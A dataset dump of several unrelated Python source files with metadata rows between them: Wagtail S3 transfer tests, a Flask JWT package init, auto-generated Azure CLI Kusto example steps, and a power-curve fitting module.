####################################################################################################
@override_settings(AWS_STORAGE_BUCKET_NAME='magna-fake-bucket-2')
@mock.patch('core.wagtail_hooks.s3.meta.client.copy')
@mock.patch('core.wagtail_hooks.ImportedFile.objects.create')
def test_s3wagtailtransferfile__transfer(
mock_importedfile_objects_create,
mock_s3_client_copy,
):
file = S3WagtailTransferFile(
local_filename='path/to/file.jpg', # not changed by DefaultStorage in this test
size=123321,
hash_='aabbccddeeff665544332211',
source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
source_bucket='magna-fake-bucket-1.s3.amazonaws.com',
source_key='path/to/file.jpg',
)
assert file.local_filename == 'path/to/file.jpg'
assert file.size == 123321
assert file.hash == 'aabbccddeeff665544332211'
assert file.source_url == 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg'
assert file.source_bucket == 'magna-fake-bucket-1.s3.amazonaws.com'
assert file.source_key == 'path/to/file.jpg'
assert not mock_s3_client_copy.called
file.transfer()
mock_s3_client_copy.assert_called_once_with(
{'Bucket': file.source_bucket, 'Key': file.source_key},
'magna-fake-bucket-2',
file.local_filename,
)
mock_importedfile_objects_create.assert_called_once_with(
file=file.local_filename,
source_url=file.source_url,
hash=file.hash,
size=file.size,
)
@pytest.mark.parametrize(
'exception_class',
(
RetriesExceededError,
S3UploadFailedError,
ValueError,
),
)
@mock.patch('core.wagtail_hooks.s3.meta.client.copy')
def test_s3wagtailtransferfile__transfer__covered_exceptions(mock_s3_client_copy, exception_class):
file = S3WagtailTransferFile(
local_filename='path/to/file.jpg', # not changed by DefaultStorage in this test
size=123321,
hash_='aabbccddeeff665544332211',
source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
source_bucket='magna-fake-bucket-1.s3.amazonaws.com',
source_key='path/to/file.jpg',
)
mock_s3_client_copy.side_effect = exception_class('Faked')
with pytest.raises(FileTransferError):
file.transfer()
@pytest.mark.parametrize(
'user_media_on_s3,expected',
(
(True, {FileField: S3FileFieldAdapter}),
(False, {}),
),
)
def test_register_s3_media_file_adapter(user_media_on_s3, expected):
with override_settings(USER_MEDIA_ON_S3=user_media_on_s3):
assert register_s3_media_file_adapter() == expected
def _fake_static(value):
return '/path/to/static/' + value
@mock.patch('core.wagtail_hooks.static')
def test_case_study_editor_css(mock_static):
mock_static.side_effect = _fake_static
assert editor_css() == '<link rel="stylesheet" href="/path/to/static/cms-admin/css/case-study.css">'
@pytest.mark.django_db
@pytest.mark.parametrize(
'request_path',
(
'/test/path/',
'/test/path/?token=test',
),
)
def test_authenticated_user_required__sets_next_param(rf, request_path):
instance = DetailPage()
assert instance.authenticated_user_required_redirect_url == cms_slugs.SIGNUP_URL
request = rf.get(request_path)
request.user = AnonymousUser()
output = wagtail_hooks.authenticated_user_required(instance, request, [], {})
assert output.status_code == 302
assert output._headers['location'] == ('Location', f'{cms_slugs.SIGNUP_URL}?next={request_path}')
| 36.044687
| 110
| 0.71758
| 4,698
| 36,297
| 5.239038
| 0.101958
| 0.030472
| 0.016252
| 0.014789
| 0.796896
| 0.765002
| 0.741437
| 0.722748
| 0.699996
| 0.685248
| 0
| 0.020055
| 0.182605
| 36,297
| 1,006
| 111
| 36.080517
| 0.809532
| 0.135741
| 0
| 0.625179
| 0
| 0.031474
| 0.183038
| 0.077636
| 0
| 0
| 0
| 0
| 0.120172
| 1
| 0.042918
| false
| 0.001431
| 0.061516
| 0.001431
| 0.105866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
a3ef281949903194f343bbc5ef6451bc098855b5
| 190
|
py
|
Python
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 1
|
2018-07-31T14:39:08.000Z
|
2018-07-31T14:39:08.000Z
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 8
|
2018-08-30T21:54:32.000Z
|
2020-12-23T15:11:38.000Z
|
flask_jwt_consumer/__init__.py
|
kojiromike/flask-jwt-consumer
|
ab7c8dcd02d67997a9e4e79355e35a6edf705800
|
[
"MIT"
] | 3
|
2018-11-13T19:35:43.000Z
|
2020-04-09T17:19:33.000Z
|
name = "flask_jwt_consumer"
from .flask_jwt_consumer import JWTConsumer
from .helpers import get_jwt_payload, get_jwt_raw
from .decorators import requires_jwt
from .errors import AuthError
| 27.142857
| 49
| 0.847368
| 28
| 190
| 5.428571
| 0.535714
| 0.105263
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110526
| 190
| 6
| 50
| 31.666667
| 0.899408
| 0
| 0
| 0
| 0
| 0
| 0.094737
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4306d76e81db038367abed5a9267bfb987af5ece
| 24,348
|
py
|
Python
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 1
|
2021-12-17T01:27:06.000Z
|
2021-12-17T01:27:06.000Z
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 5
|
2022-03-08T17:46:24.000Z
|
2022-03-23T18:27:45.000Z
|
src/kusto/azext_kusto/tests/latest/example_steps.py
|
wwendyc/azure-cli-extensions
|
6b4099676bb5d43fdb57bc69f9c0281cca510a0a
|
[
"MIT"
] | 5
|
2020-09-08T22:46:48.000Z
|
2020-11-08T14:54:35.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .. import try_manual
# EXAMPLE: /AttachedDatabaseConfigurations/put/AttachedDatabaseConfigurationsCreateOrUpdate
@try_manual
def step_attached_database_configuration_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration create '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--location "westus" '
'--cluster-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.Kusto/Clu'
'sters/{myCluster3}" '
'--database-name "kustodatabase" '
'--default-principals-modification-kind "Union" '
'--table-level-sharing-properties external-tables-to-exclude="ExternalTable2" '
'external-tables-to-include="ExternalTable1" materialized-views-to-exclude="MaterializedViewTable2" '
'materialized-views-to-include="MaterializedViewTable1" tables-to-exclude="Table2" '
'tables-to-include="Table1" '
'--resource-group "{rg}"',
checks=[])
test.cmd('az kusto attached-database-configuration wait --created '
'--name "{myAttachedDatabaseConfiguration2}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/get/AttachedDatabaseConfigurationsGet
@try_manual
def step_attached_database_configuration_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration show '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/get/KustoAttachedDatabaseConfigurationsListByCluster
@try_manual
def step_attached_database_configuration_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/put/KustoClustersCreateOrUpdate
@try_manual
def step_cluster_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster create '
'--cluster-name "{Clusters_3}" '
'--identity-type "SystemAssigned" '
'--location "southcentralus" '
'--enable-purge true '
'--enable-streaming-ingest true '
'--key-vault-properties key-name="" key-vault-uri="" key-version="" '
'--sku name="Standard_D11_v2" capacity=2 tier="Standard" '
'--resource-group "{rg}"',
checks=[])
test.cmd('az kusto cluster wait --created '
'--cluster-name "{Clusters_3}" '
'--resource-group "{rg}"',
checks=[])
# EXAMPLE: /Clusters/get/KustoClustersGet
@try_manual
def step_cluster_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster show '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersList
@try_manual
def step_cluster_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list '
'-g ""',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListByResourceGroup
@try_manual
def step_cluster_list2(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListResourceSkus
@try_manual
def step_cluster_list_sku(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-sku '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/get/KustoClustersListSkus
@try_manual
def step_cluster_list_sku2(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-sku '
'-g ""',
checks=checks)
# EXAMPLE: /Clusters/patch/KustoClustersUpdate
@try_manual
def step_cluster_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster update '
'--name "{myCluster}" '
'--type "SystemAssigned" '
'--location "westus" '
'--enable-purge true '
'--enable-streaming-ingest true '
'--engine-type "V2" '
'--key-vault-properties key-name="keyName" key-vault-uri="https://dummy.keyvault.com" '
'key-version="keyVersion" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterAddLanguageExtensions
@try_manual
def step_cluster_add_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster add-language-extension '
'--name "{myCluster}" '
'--value language-extension-name="PYTHON" '
'--value language-extension-name="R" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterDetachFollowerDatabases
@try_manual
def step_cluster_detach_follower_database(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster detach-follower-database '
'--name "{myCluster}" '
'--attached-database-configuration-name "{myAttachedDatabaseConfiguration}" '
'--cluster-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.Kusto/clu'
'sters/{myCluster2}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterDiagnoseVirtualNetwork
@try_manual
def step_cluster_diagnose_virtual_network(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster diagnose-virtual-network '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterListFollowerDatabases
@try_manual
def step_cluster_list_follower_database(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-follower-database '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterListLanguageExtensions
@try_manual
def step_cluster_list_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster list-language-extension '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClusterRemoveLanguageExtensions
@try_manual
def step_cluster_remove_language_extension(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster remove-language-extension '
'--name "{myCluster}" '
'--value language-extension-name="PYTHON" '
'--value language-extension-name="R" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClustersStart
@try_manual
def step_cluster_start(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster start '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/post/KustoClustersStop
@try_manual
def step_cluster_stop(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster stop '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/put/KustoClusterPrincipalAssignmentsCreateOrUpdate
@try_manual
def step_cluster_principal_assignment_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment create '
'--cluster-name "{myCluster}" '
'--principal-id "87654321-1234-1234-1234-123456789123" '
'--principal-type "App" '
'--role "AllDatabasesAdmin" '
'--tenant-id "12345678-1234-1234-1234-123456789123" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/get/KustoClusterPrincipalAssignmentsGet
@try_manual
def step_cluster_principal_assignment_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment show '
'--cluster-name "{myCluster}" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/get/KustoPrincipalAssignmentsList
@try_manual
def step_cluster_principal_assignment_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/put/KustoDatabasePrincipalAssignmentsCreateOrUpdate
@try_manual
def step_database_principal_assignment_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment create '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-id "87654321-1234-1234-1234-123456789123" '
'--principal-type "App" '
'--role "Admin" '
'--tenant-id "12345678-1234-1234-1234-123456789123" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/get/KustoDatabasePrincipalAssignmentsGet
@try_manual
def step_database_principal_assignment_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment show '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/get/KustoPrincipalAssignmentsList
@try_manual
def step_database_principal_assignment_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment list '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DatabasePrincipalAssignments/delete/KustoDatabasePrincipalAssignmentsDelete
@try_manual
def step_database_principal_assignment_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database-principal-assignment delete -y '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/put/Kusto ReadWrite database create or update
@try_manual
def step_database_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database create '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--parameters "{{\\"location\\":\\"westus\\",\\"properties\\":{{\\"softDeletePeriod\\":\\"P1D\\"}}}}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/get/KustoDatabasesGet
@try_manual
def step_database_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database show '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/get/KustoDatabasesListByCluster
@try_manual
def step_database_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database list '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/patch/KustoDatabasesUpdate
@try_manual
def step_database_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database update '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--parameters "{{\\"properties\\":{{\\"hotCachePeriod\\":\\"P1D\\"}}}}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseAddPrincipals
@try_manual
def step_database_add_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database add-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--value name="Some User" type="User" app-id="" email="user@microsoft.com" fqn="aaduser role="Admin" '
'--value name="Kusto" type="Group" app-id="" email="kusto@microsoft.com" fqn="aadgroup role="Viewer" '
'--value name="SomeApp" type="App" app-id="some_guid_app_id" email="" fqn="aadapp role="Admin" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseListPrincipals
@try_manual
def step_database_list_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database list-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/post/KustoDatabaseRemovePrincipals
@try_manual
def step_database_remove_principal(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database remove-principal '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--value name="Some User" type="User" app-id="" email="user@microsoft.com" fqn="aaduser role="Admin" '
'--value name="Kusto" type="Group" app-id="" email="kusto@microsoft.com" fqn="aadgroup role="Viewer" '
'--value name="SomeApp" type="App" app-id="some_guid_app_id" email="" fqn="aadapp role="Admin" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Databases/delete/KustoDatabasesDelete
@try_manual
def step_database_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto database delete -y '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/put/KustoDataConnectionsCreateOrUpdate
@try_manual
def step_data_connection_event_hub_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub create '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--location "westus" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/get/KustoDatabasesListByCluster
@try_manual
def step_data_connection_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection list '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/get/KustoDataConnectionsGet
@try_manual
def step_data_connection_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection show '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/patch/KustoDataConnectionsUpdate
@try_manual
def step_data_connection_event_hub_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub update '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection}" '
'--database-name "KustoDatabase8" '
'--location "westus" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/post/KustoDataConnectionValidation
@try_manual
def step_data_connection_event(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection event-hub data-connection-validation '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--name "{myDataConnection}" '
'--consumer-group "testConsumerGroup1" '
'--event-hub-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.EventHu'
'b/namespaces/eventhubTestns1/eventhubs/eventhubTest1" '
'--managed-identity-resource-id "/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.'
'ManagedIdentity/userAssignedIdentities/managedidentityTest1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /DataConnections/delete/KustoDataConnectionsDelete
@try_manual
def step_data_connection_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto data-connection delete -y '
'--cluster-name "{myCluster}" '
'--name "{myDataConnection2}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Clusters/delete/KustoClustersDelete
@try_manual
def step_cluster_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster delete -y '
'--name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /AttachedDatabaseConfigurations/delete/AttachedDatabaseConfigurationsDelete
@try_manual
def step_attached_database_configuration_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto attached-database-configuration delete -y '
'--name "{myAttachedDatabaseConfiguration2}" '
'--cluster-name "{myCluster}" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /ClusterPrincipalAssignments/delete/KustoClusterPrincipalAssignmentsDelete
@try_manual
def step_cluster_principal_assignment_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto cluster-principal-assignment delete -y '
'--cluster-name "{myCluster}" '
'--principal-assignment-name "kustoprincipal1" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /OperationsResults/get/KustoOperationResultsGet
@try_manual
def step_operation_result_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto operation-result show '
'--operation-id "30972f1b-b61d-4fd8-bd34-3dcfa24670f3" '
'--location "westus"',
checks=checks)
# EXAMPLE: /Scripts/put/KustoScriptsCreateOrUpdate
@try_manual
def step_script_create(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script create '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--continue-on-errors true '
'--force-update-tag "2bcf3c21-ffd1-4444-b9dd-e52e00ee53fe" '
'--script-url "https://mysa.blob.core.windows.net/container/script.txt" '
'--script-url-sas-token "?sv=2019-02-02&st=2019-04-29T22%3A18%3A26Z&se=2019-04-30T02%3A23%3A26Z&sr=b&sp=rw'
'&sip=168.1.5.60-168.1.5.70&spr=https&sig=********************************" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=[])
test.cmd('az kusto script wait --created '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/get/KustoScriptsGet
@try_manual
def step_script_show(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script show '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/get/KustoScriptsList
@try_manual
def step_script_list(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script list '
'--cluster-name "{myCluster}" '
'--database-name "Kustodatabase8" '
'--resource-group "{rg}"',
checks=checks)
# EXAMPLE: /Scripts/patch/KustoScriptsUpdate
@try_manual
def step_script_update(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script update '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--continue-on-errors true '
'--force-update-tag "2bcf3c21-ffd1-4444-b9dd-e52e00ee53fe" '
'--script-url "https://mysa.blob.core.windows.net/container/script.txt" '
'--script-url-sas-token "?sv=2019-02-02&st=2019-04-29T22%3A18%3A26Z&se=2019-04-30T02%3A23%3A26Z&sr=b&sp=rw'
'&sip=168.1.5.60-168.1.5.70&spr=https&sig=********************************" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
# EXAMPLE: /Scripts/delete/KustoScriptsDelete
@try_manual
def step_script_delete(test, rg, checks=None):
if checks is None:
checks = []
test.cmd('az kusto script delete -y '
'--cluster-name "{myCluster}" '
'--database-name "KustoDatabase8" '
'--resource-group "{rg}" '
'--name "{myScript}"',
checks=checks)
| 36.779456
| 120
| 0.610112
| 2,409
| 24,348
| 6.07721
| 0.125363
| 0.049727
| 0.045287
| 0.052254
| 0.798907
| 0.750342
| 0.717008
| 0.664208
| 0.626981
| 0.606762
| 0
| 0.019112
| 0.245729
| 24,348
| 661
| 121
| 36.835098
| 0.778056
| 0.135494
| 0
| 0.758893
| 0
| 0.041502
| 0.465152
| 0.172264
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094862
| false
| 0
| 0.001976
| 0
| 0.096838
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
43132abdfb917f0de01729cb005aaa47244892f8
| 2,198
|
py
|
Python
|
skg/pow.py
|
bluenote10/scikit-guess
|
16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
skg/pow.py
|
bluenote10/scikit-guess
|
16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
skg/pow.py
|
bluenote10/scikit-guess
|
16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Power fit with additive bias.
.. todo::
Add proper handling of colinear inputs (and other singular matrix cases).
.. todo::
Add tests.
.. todo::
Add nan_policy argument.
"""
from future import division, absolute_import
from numpy import log, power
from .exp import exp_fit
__all__ = ['pow_fit']
def pow_fit(x, y, sorted=True):
"""
Fit a power curve to raveled 1D data.
The fitting parameters are comptued for:
.. math::
y = A + Bx^C
Parameters
----------
x : array-like
The x-values of the data points. The fit will be performed on a
raveled version of this array. All elements must be positive.
y : array-like
The y-values of the data points corresponding to `x`. Must be
the same size as `x`. The fit will be performed on a raveled
version of this array.
sorted : bool
Set to True if `x` is already monotonically increasing or
decreasing. If False, `x` will be sorted into increasing order,
and `y` will be sorted along with it.
Return
------
a, b, c : array
A 3-element array of optimized fitting parameters. The first
element is the additive bias, the second the multiplicative, and
the third is the power.
Notes
-----
``pow_fit(x, y, sorted)`` is equivalent to
``exp_fit(log(x), y, sorted)`` since
.. math::
A + Be^{Cx} = A + B(e^x)^C
References
----------
Jacquelin, Jean. "REGRESSIONS Et EQUATIONS INTEGRALES", pp. 15–18.,
Available online: https://www.scribd.com/doc/14674814/Regressions-et-equations-integrales
"""
return exp_fit(log(x), y, sorted)
def model(x, a, b, c):
"""
Compute
.. math::
y = A + Bx^C
Parameters
----------
x : array-like
The value of the model will be the same shape as the input.
a : float
The additive bias.
b : float
The multiplicative bias.
c : float
The power.
Return
------
y : array-like
An array of the same shape as ``x``, containing the model
computed for the given parameters.
"""
return a + b * power(x, c)
| 21.54902
| 93
| 0.595996
| 314
| 2,198
| 4.136943
| 0.398089
| 0.023095
| 0.024634
| 0.012317
| 0.204773
| 0.150885
| 0.124711
| 0.124711
| 0.124711
| 0.124711
| 0
| 0.009061
| 0.297088
| 2,198
| 101
| 94
| 21.762376
| 0.831068
| 0.77252
| 0
| 0
| 0
| 0
| 0.026415
| 0
| 0
| 0
| 0
| 0.029703
| 0
| 1
| 0.25
| false
| 0
| 0.375
| 0
| 0.875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4a4d0d7410f5a033ee19b01330fb9d94da00963f
| 145
|
py
|
Python
|
tests/package/__init__.py
|
purmirl/ProbeArrow
|
7c2c7d0765130d61ccd0c998d0b305b660708d56
|
[
"BSD-3-Clause"
] | 5
|
2021-04-15T03:14:27.000Z
|
2021-11-11T06:38:49.000Z
|
tests/package/__init__.py
|
purmirl/TRACE-ROUTE
|
0a259a601d7b10c03bc4cb820ac2ce23dd6d9e37
|
[
"BSD-3-Clause"
] | 5
|
2021-01-16T12:52:15.000Z
|
2021-06-29T14:43:54.000Z
|
tests/package/__init__.py
|
purmirl/TRACE-ROUTE
|
0a259a601d7b10c03bc4cb820ac2ce23dd6d9e37
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright 2020~ PeTrA. All rights reserved.
. Python Project Structure Repository;
"""
# PythonProjectStructure/tests/package/__init__.py;
| 24.166667
| 51
| 0.765517
| 15
| 145
| 7.133333
